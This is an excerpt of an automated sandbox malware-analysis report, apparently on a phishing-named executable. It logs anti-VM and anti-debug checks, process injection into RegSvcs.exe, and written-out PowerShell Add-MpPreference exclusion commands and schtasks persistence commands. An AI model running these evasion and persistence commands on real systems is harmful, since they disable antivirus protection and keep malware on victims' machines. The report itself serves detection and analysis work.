Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 2320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 4A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 5A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 5B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 6B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: 9890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: A890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: AD20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory allocated: BD20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 4DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 5DF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 5F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 6F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 97E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: 9130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Memory allocated: A7E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4619	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 538	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6097	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 528	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep count: 4619 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep count: 538 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

8_2_00403D74

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753742773.0000000000817000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1753742773.0000000000817000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: IOsbBBIDAm.exe, 00000009.00000002.2072636364.0000000007D71000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: RegSvcs.exe, 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040317B mov eax, dword ptr fs:[00000030h]

8_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_00402B7C GetProcessHeap,RtlAllocateHeap,

8_2_00402B7C

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10FC008	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
